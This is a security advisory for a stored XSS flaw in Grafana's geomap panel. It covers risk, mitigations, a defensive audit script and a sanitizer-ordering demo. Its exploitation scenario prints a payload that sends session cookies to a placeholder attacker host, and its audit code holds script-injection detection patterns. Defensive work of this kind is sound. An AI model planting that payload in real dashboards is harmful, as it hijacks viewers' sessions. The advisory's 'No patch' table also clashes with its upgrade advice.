CVE-2026-9029: Grafana: stored XSS in geomap bypasses CVE-2023-0507 fix

HIGH
Published June 22, 2026
CISO Take

Grafana's geomap panel contains a sanitize-then-interpolate ordering flaw where the HTML sanitizer runs on the raw template string before variable substitution occurs, meaning an attacker-controlled variable value is injected into element.innerHTML without escaping. Any user holding Editor-level access — a low privilege threshold — can plant a persistent XSS payload in a textbox variable's default value that fires automatically for every dashboard viewer, no interaction beyond page load required. This is an explicit bypass of the CVE-2023-0507 patch, indicating Grafana's XSS defense layer has a structural gap rather than a one-off miss. Organizations running Grafana as their MLOps observability or AI model monitoring layer are directly exposed: a compromised Editor account can silently exfiltrate session tokens, scrape displayed model metrics, or pivot laterally into internal tooling. Patch to the vendor-fixed release immediately; if patching is delayed, restrict Editor role assignments and audit dashboard template variables for unexpected HTML or script content.

Sources: NVD, grafana.com, ATLAS

What is the risk?

High risk for organizations using Grafana in ML/AI monitoring stacks. CVSS 7.3 reflects network-reachable, low-complexity exploitation requiring only Editor-level credentials and a single victim page load. The fix-bypass nature elevates this beyond a typical stored XSS — teams that previously patched CVE-2023-0507 and considered themselves remediated are still vulnerable. No public exploit or CISA KEV listing currently, but the attack primitive (craft variable value, wait for viewers) is trivial to operationalize. Blast radius scales with dashboard sharing practices: shared ML monitoring dashboards in larger organizations could expose dozens to hundreds of security and engineering staff.

How does the attack unfold?

Privilege Abuse
Adversary with Editor-level Grafana credentials (obtained via phishing, credential stuffing, or insider access) modifies a textbox template variable's default value to a crafted XSS payload in a widely-shared ML monitoring dashboard.
AML.T0012
Sanitizer Bypass
Grafana's sanitizeTextPanelContent() processes the raw template string before getTemplateSrv().replace() substitutes the variable value, so the injected payload bypasses sanitization and is embedded unescaped in the geomap panel's HTML output.
AML.T0049
Victim Execution
Any user who opens the dashboard triggers the XSS — the payload executes in their browser via element.innerHTML without any additional interaction beyond the page load.
AML.T0011
Data Exfiltration & Pivot
The JavaScript payload exfiltrates session cookies and visible ML monitoring data to attacker infrastructure, and may pivot to internal AI serving endpoints or model management APIs accessible from the victim's authenticated session.
AML.T0025

What systems are affected?

Package Ecosystem Vulnerable Range Patched
Grafana OSS No patch

Do you use Grafana OSS? You're affected.

How severe is it?

CVSS 3.1
7.3 / 10
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Trivial

What is the attack surface?

AV (Attack Vector): Network
AC (Attack Complexity): Low
PR (Privileges Required): Low
UI (User Interaction): Required
S (Scope): Unchanged
C (Confidentiality): High
I (Integrity): High
A (Availability): None

What should I do?

6 steps
  1. Patch: Apply the vendor-supplied fix referenced in the security advisory at grafana.com/security/security-advisories/cve-2026-9029 — upgrade to the patched Grafana OSS release immediately.

  2. Interim workaround: Disable the geomap panel plugin across affected Grafana instances if patching cannot be done immediately.

  3. Privilege audit: Review Editor role assignments and remove any accounts that do not require dashboard editing capabilities — this directly reduces the attack surface.

  4. Dashboard audit: Inspect all dashboard template variable default values for suspicious HTML, script tags, or JavaScript URIs; use Grafana's dashboard API to enumerate variables at scale.

  5. Detection: Review Grafana audit logs for unexpected variable modifications by Editor-level accounts; alert on base64-encoded strings or script keywords appearing in dashboard configuration.

  6. Defense-in-depth: Enforce a strict Content Security Policy on the Grafana origin to limit JavaScript execution scope even if XSS fires.
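
Steps 4 and 5 above call for enumerating template variables and flagging HTML, script keywords or base64 blobs in their stored values. The following is an added example (not the advisory's or Grafana's own code) that runs that audit over a dashboard JSON model. The field layout it assumes (`templating.list[]` entries with `query`, `current.value`, `current.text` and `options[].value`) follows the Grafana dashboard JSON model as the author understands it; the sample dashboard and the `probe()` marker string are constructed.

```javascript
// Indicators that a value meant to be plain text actually carries markup or script.
const INDICATORS = [
  { id: 'html-tag',      re: /<\s*\/?[a-z][^>]*>/i },
  { id: 'event-handler', re: /\bon[a-z]+\s*=/i },
  { id: 'js-uri',        re: /javascript\s*:/i },
  { id: 'data-html',     re: /data\s*:\s*text\/html/i },
  // A long run of base64 alphabet (40+ chars) is worth a look in a dashboard variable.
  { id: 'base64-blob',   re: /(?:[A-Za-z0-9+/]{4}){10,}={0,2}/ },
];

// Return the ids of every indicator that matches the value.
function classify(value) {
  const s = String(value ?? '');
  return INDICATORS.filter(({ re }) => re.test(s)).map(({ id }) => id);
}

// Every place a variable's default or current value can live in the JSON model
// (field names are assumptions about the dashboard model, see lead-in).
function variableValues(variable) {
  const out = [];
  if (variable.query !== undefined) out.push({ field: 'query', value: variable.query });
  if (variable.current) {
    out.push({ field: 'current.value', value: variable.current.value });
    out.push({ field: 'current.text', value: variable.current.text });
  }
  for (const [i, opt] of (variable.options || []).entries()) {
    out.push({ field: `options[${i}].value`, value: opt.value });
  }
  return out;
}

// One finding per (variable, field) whose value trips at least one indicator.
function auditDashboardVariables(dashboard) {
  const findings = [];
  const vars = (dashboard.templating && dashboard.templating.list) || [];
  for (const v of vars) {
    for (const { field, value } of variableValues(v)) {
      const hits = classify(value);
      if (hits.length) {
        findings.push({
          dashboard: dashboard.uid, variable: v.name, type: v.type,
          field, indicators: hits, value: String(value),
        });
      }
    }
  }
  return findings;
}

// Constructed sample: one benign textbox, one textbox with markup planted in its
// default value, and a custom variable that should produce no findings.
const SAMPLE_DASHBOARD = {
  uid: 'ml-monitor-01',
  title: 'Model serving overview',
  templating: {
    list: [
      { name: 'region', type: 'textbox', query: 'eu-west-1',
        current: { text: 'eu-west-1', value: 'eu-west-1' } },
      { name: 'tileLabel', type: 'textbox', query: '<img src=x onerror=probe()>',
        current: { text: '<img src=x onerror=probe()>', value: '<img src=x onerror=probe()>' } },
      { name: 'model', type: 'custom', query: 'fraud-v3,churn-v2',
        options: [{ text: 'fraud-v3', value: 'fraud-v3' }, { text: 'churn-v2', value: 'churn-v2' }] },
    ],
  },
};

for (const f of auditDashboardVariables(SAMPLE_DASHBOARD)) console.log(JSON.stringify(f));
```

To run this at scale, feed it the JSON returned for each dashboard by the dashboard API and collect the findings per `uid`; a finding on any `textbox` variable is the case the advisory describes and should be reviewed against the audit log for who last changed it.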

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Art. 9 - Risk management system
ISO 42001
A.9.4 - Access control to AI system components
NIST AI RMF
GOVERN 6.1 - Policies and procedures for AI risk management
OWASP LLM Top 10
LLM09:2025 - Misinformation

Frequently Asked Questions

Is CVE-2026-9029 actively exploited?

No confirmed active exploitation of CVE-2026-9029 has been reported, but organizations should still patch proactively.

What systems are affected by CVE-2026-9029?

This vulnerability affects the following AI/ML architecture patterns: ML monitoring and observability platforms, MLOps dashboards, AI model serving monitoring, Data pipeline observability stacks, GPU and training infrastructure dashboards.

What is the CVSS score for CVE-2026-9029?

CVE-2026-9029 has a CVSS v3.1 base score of 7.3 (HIGH).

What is the AI security impact?

Affected AI Architectures

ML monitoring and observability platforms
MLOps dashboards
AI model serving monitoring
Data pipeline observability stacks
GPU and training infrastructure dashboards

MITRE ATLAS Techniques

AML.T0011 User Execution
AML.T0025 Exfiltration via Cyber Means
AML.T0048.003 User Harm
AML.T0049 Exploit Public-Facing Application

Compliance Controls Affected

EU AI Act: Art. 9
ISO 42001: A.9.4
NIST AI RMF: GOVERN 6.1
OWASP LLM Top 10: LLM09:2025

What are the technical details?

Original Advisory

The geomap panel's XYZ tile layer has a sanitize-then-interpolate ordering bug. sanitizeTextPanelContent() runs on the raw template string before getTemplateSrv().replace() substitutes the variable value, which uses the glob format with no HTML escaping. The result is passed to OpenLayers via element.innerHTML. An Editor can set a textbox variable's default value to an XSS payload that executes for every user who opens the dashboard. This is a bypass of the CVE-2023-0507 fix.
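
The ordering flaw described in the advisory above and in the "Sanitizer Bypass" step earlier is easiest to see side by side with a correct ordering. The block below is an added illustration, not Grafana's code: `sanitizeHtml()` is a minimal stand-in for `sanitizeTextPanelContent()`, `interpolate()` stands in for `getTemplateSrv().replace()` (its default formatter performs no escaping, matching the "glob" behaviour the advisory describes), and `renderHardened()` shows one correct ordering (escape each substituted value, then sanitize the final string), which is an assumption here and not a description of the vendor's actual fix. The template, the variable value and the `probe()` marker are constructed.

```javascript
// Tags the stand-in sanitizer lets through (constructed allow-list).
const ALLOWED_TAGS = new Set(['b', 'i', 'em', 'strong', 'a', 'p', 'br', 'span']);

// Drop script/style bodies, remove every tag not on the allow-list, and strip
// inline event handlers and javascript: hrefs from the tags that remain.
function sanitizeHtml(html) {
  let out = html.replace(/<(script|style)\b[^>]*>[\s\S]*?<\/\1\s*>/gi, '');
  out = out.replace(/<\/?([a-zA-Z][a-zA-Z0-9]*)\b([^>]*)>/g, (whole, tag, attrs) => {
    if (!ALLOWED_TAGS.has(tag.toLowerCase())) return '';
    if (whole.startsWith('</')) return `</${tag}>`;
    const cleanAttrs = attrs
      .replace(/\s+on[a-z]+\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)/gi, '')
      .replace(/\s+href\s*=\s*("\s*javascript:[^"]*"|'\s*javascript:[^']*'|javascript:[^\s>]+)/gi, '');
    return `<${tag}${cleanAttrs}>`;
  });
  return out;
}

// HTML-escape a variable value so it can only ever render as text.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Substitute $name / ${name} references. The default identity formatter mirrors
// the no-escaping "glob" format from the advisory; pass escapeHtml to be safe.
function interpolate(template, vars, format = (v) => v) {
  return template.replace(/\$\{(\w+)\}|\$(\w+)/g, (match, braced, bare) => {
    const name = braced || bare;
    return Object.prototype.hasOwnProperty.call(vars, name) ? format(vars[name]) : match;
  });
}

// Vulnerable ordering: the sanitizer only ever sees the literal "${tileLabel}",
// so whatever the variable holds reaches innerHTML untouched.
function renderVulnerable(template, vars) {
  return interpolate(sanitizeHtml(template), vars);
}

// One correct ordering (assumed, not the vendor fix): escape every substituted
// value, then sanitize the fully interpolated string.
function renderHardened(template, vars) {
  return sanitizeHtml(interpolate(template, vars, escapeHtml));
}

// Constructed inputs: a panel template and an Editor-controlled textbox default.
const TEMPLATE = '<b>Tiles: ${tileLabel}</b>';
const VARS = { tileLabel: '<img src=x onerror=probe()>' };

console.log('vulnerable:', renderVulnerable(TEMPLATE, VARS));
console.log('hardened:  ', renderHardened(TEMPLATE, VARS));
```

The point the example makes is that a sanitizer is only as good as the string it sees: run before interpolation it validates the template author's markup, not the value an Editor stored in the variable. Sanitizing after interpolation (and escaping values on the way in) closes that gap regardless of which template variable carried the content.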

Exploitation Scenario

An adversary with a compromised or insider Editor account on a Grafana instance used for AI model monitoring opens the geomap panel configuration and sets a textbox template variable's default value to a JavaScript payload such as `<img src=x onerror=fetch('https://attacker.io/?t='+document.cookie)>`. Because the sanitizer processes the raw template string before variable interpolation, the payload passes sanitization clean and is injected verbatim into the OpenLayers HTML. Every ML engineer, data scientist, or CISO who opens the monitoring dashboard automatically exfiltrates their Grafana session cookie to the attacker. The attacker replays the session cookie to access Grafana as those users, views sensitive ML pipeline metrics and model serving endpoint configurations, and may discover internal URLs to pivot deeper into the AI infrastructure.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N

Timeline

Published
June 22, 2026
Last Modified
June 22, 2026
First Seen
June 22, 2026
